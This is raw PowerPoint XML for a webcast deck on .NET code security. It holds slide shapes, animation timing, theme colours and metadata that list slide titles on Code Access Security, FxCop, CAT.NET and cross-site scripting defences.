            <a:ext cx="2070100" cy="650875"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="919191"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security exception</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access denied</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191536" name="AutoShape 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3873500" y="5473700"/>
            <a:ext cx="2070100" cy="650875"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="919191"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Grant access?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 49"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7473950" y="6051550"/>
            <a:ext cx="914400" cy="425450"/>
            <a:chOff x="384" y="3024"/>
            <a:chExt cx="720" cy="336"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="191538" name="Oval 50"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="384" y="3024"/>
              <a:ext cx="720" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill rotWithShape="0">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="666699"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="99CCFF"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="17961" dir="2700000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="969696"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="es-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 51"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="480" y="3096"/>
              <a:ext cx="240" cy="192"/>
              <a:chOff x="480" y="3096"/>
              <a:chExt cx="240" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="191540" name="Oval 52"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="480" y="3096"/>
                <a:ext cx="240" cy="192"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="666699"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="99CCFF"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="18900000" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="es-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="191541" name="Freeform 53"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="539" y="3123"/>
                <a:ext cx="138" cy="132"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="0" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="576"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="432" y="288"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="0"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="432" h="576">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="91" y="226"/>
                      <a:pt x="0" y="576"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="432"/>
                      <a:pt x="432" y="288"/>
                      <a:pt x="432" y="288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FFFFCC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FFCC66"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="18900000" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="666699"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="none" w="med" len="med"/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw dist="17961" dir="8100000" algn="ctr" rotWithShape="0">
                  <a:schemeClr val="tx1"/>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="es-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 54"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7961313" y="6142038"/>
            <a:ext cx="304800" cy="244475"/>
            <a:chOff x="768" y="3096"/>
            <a:chExt cx="240" cy="192"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="191543" name="Oval 55"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="768" y="3096"/>
              <a:ext cx="240" cy="192"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill rotWithShape="0">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="666699"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="99CCFF"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="18900000" scaled="1"/>
            </a:gradFill>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="es-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="191544" name="Rectangle 56"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="840" y="3144"/>
              <a:ext cx="96" cy="96"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="FFFFCC"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FFCC66"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="18900000" scaled="1"/>
            </a:gradFill>
            <a:ln w="9525" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="666699"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="17961" dir="8100000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="tx1"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="es-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1530">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530">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="1"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91530">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetID="22" presetClass="entr" presetSubtype="1"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1530">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="25" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="191534"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="191534"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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191532"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="191532"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="32" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="33" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="191531"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="191531"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="36" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="37" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="191533"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="191533"/>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191528"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="191528"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="191529"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="191529"/>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91530">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="52" presetID="1" presetClass="exit" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="191536"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="54" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="191535"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="191535"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="57" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="58" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="5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528" grpId="0" animBg="1"/>
      <p:bldP spid="191529" grpId="0" animBg="1"/>
      <p:bldP spid="191530" grpId="0" build="p" animBg="1"/>
      <p:bldP spid="191531" grpId="0" animBg="1"/>
      <p:bldP spid="191532" grpId="0" animBg="1"/>
      <p:bldP spid="191533" grpId="0" animBg="1"/>
      <p:bldP spid="191535" grpId="0" animBg="1"/>
      <p:bldP spid="191536" grpId="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Webcast Template - MSDN">
  <a:themeElements>
    <a:clrScheme name="Webcast Template - MSDN 1">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="00478E"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFDD4F"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="FCEB98"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="EB7C35"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="AAB1C6"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="DADADA"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FDF3CA"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="D5702F"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="74C35F"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="6294CD"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Webcast Template - MSD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alpha val="52000"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF9900"/>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4763" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
          <a:lnSpc>
            <a:spcPct val="90000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPct val="60000"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPct val="0"/>
          </a:spcAft>
          <a:buClr>
            <a:srgbClr val="D60093"/>
          </a:buClr>
          <a:buSzPct val="65000"/>
          <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
          <a:buNone/>
          <a:tabLst/>
          <a:defRPr kumimoji="0" lang="en-GB"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tx2">
            <a:alpha val="52000"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF9900"/>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4763" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
          <a:lnSpc>
            <a:spcPct val="90000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPct val="60000"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPct val="0"/>
          </a:spcAft>
          <a:buClr>
            <a:srgbClr val="D60093"/>
          </a:buClr>
          <a:buSzPct val="65000"/>
          <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
          <a:buNone/>
          <a:tabLst/>
          <a:defRPr kumimoji="0" lang="en-GB"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Webcast Template - MSDN 1">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="00478E"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFDD4F"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="FCEB98"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="EB7C35"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="AAB1C6"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="DADADA"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="FDF3CA"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="D5702F"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="74C35F"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="6294C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Webcast Template - MSDN</Template>
  <TotalTime>3525</TotalTime>
  <Words>4008</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>416</Paragraphs>
  <Slides>40</Slides>
  <Notes>29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Times New Roman</vt:lpstr>
      <vt:lpstr>Franklin Gothic Medium</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Lucida Sans Typewriter</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Webcast Template - MSDN</vt:lpstr>
      <vt:lpstr>.NET Code security including 4.0 &amp; Tools</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>.NET Code Access Security (CAS) Policy</vt:lpstr>
      <vt:lpstr>Strong-Named Assemblies</vt:lpstr>
      <vt:lpstr>Evidence-Based Security</vt:lpstr>
      <vt:lpstr>Security Policies (up to .NET 2.0)</vt:lpstr>
      <vt:lpstr>Permission Sets</vt:lpstr>
      <vt:lpstr>Types of Security Checks</vt:lpstr>
      <vt:lpstr>Security Check Stack Walks</vt:lpstr>
      <vt:lpstr>Permission Requests</vt:lpstr>
      <vt:lpstr>Create a code group</vt:lpstr>
      <vt:lpstr>Specify Membership Condition</vt:lpstr>
      <vt:lpstr>Select a permission set</vt:lpstr>
      <vt:lpstr>Naming the permission set</vt:lpstr>
      <vt:lpstr>Assign permission sets</vt:lpstr>
      <vt:lpstr>Setting File I/O permissions</vt:lpstr>
      <vt:lpstr>Completing Code Group Creation</vt:lpstr>
      <vt:lpstr>Security Policy in the v4 CLR</vt:lpstr>
      <vt:lpstr>Sandboxing Privileged Code</vt:lpstr>
      <vt:lpstr>Evidence Types</vt:lpstr>
      <vt:lpstr>AppDomain Managers</vt:lpstr>
      <vt:lpstr>Software Restriction Policy</vt:lpstr>
      <vt:lpstr>New Software Restriction Policies</vt:lpstr>
      <vt:lpstr>1. Sign the application</vt:lpstr>
      <vt:lpstr>2. Set the publisher</vt:lpstr>
      <vt:lpstr>Windows Application Locker</vt:lpstr>
      <vt:lpstr>Isolated Storage</vt:lpstr>
      <vt:lpstr>TOOLS to Help with security</vt:lpstr>
      <vt:lpstr>FXCop</vt:lpstr>
      <vt:lpstr>FxCop demo</vt:lpstr>
      <vt:lpstr>Microsoft Code Analysis Tool .NET</vt:lpstr>
      <vt:lpstr>CAT.NET demo</vt:lpstr>
      <vt:lpstr>Cross Site Scripting</vt:lpstr>
      <vt:lpstr>XSS Attack !</vt:lpstr>
      <vt:lpstr>Microsoft Anti-Cross Site Scripting Library V3.0</vt:lpstr>
      <vt:lpstr>Session Summary</vt:lpstr>
      <vt:lpstr>Next Steps</vt:lpstr>
      <vt:lpstr>For More Information</vt:lpstr>
      <vt:lpstr>Questions and Answers</vt:lpstr>
      <vt:lpstr>Slide 40</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>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MGB 2003</dc:subject>
  <dc:creator>jonarce</dc:creator>
  <dc:description>Template design: aliciad_x000d_
Formatter:_x000d_
Event Date:_x000d_
Event Location:_x000d_
Speech Length:_x000d_
Audience:_x000d_
Key Topics:</dc:description>
  <cp:lastModifiedBy>Jon Arce</cp:lastModifiedBy>
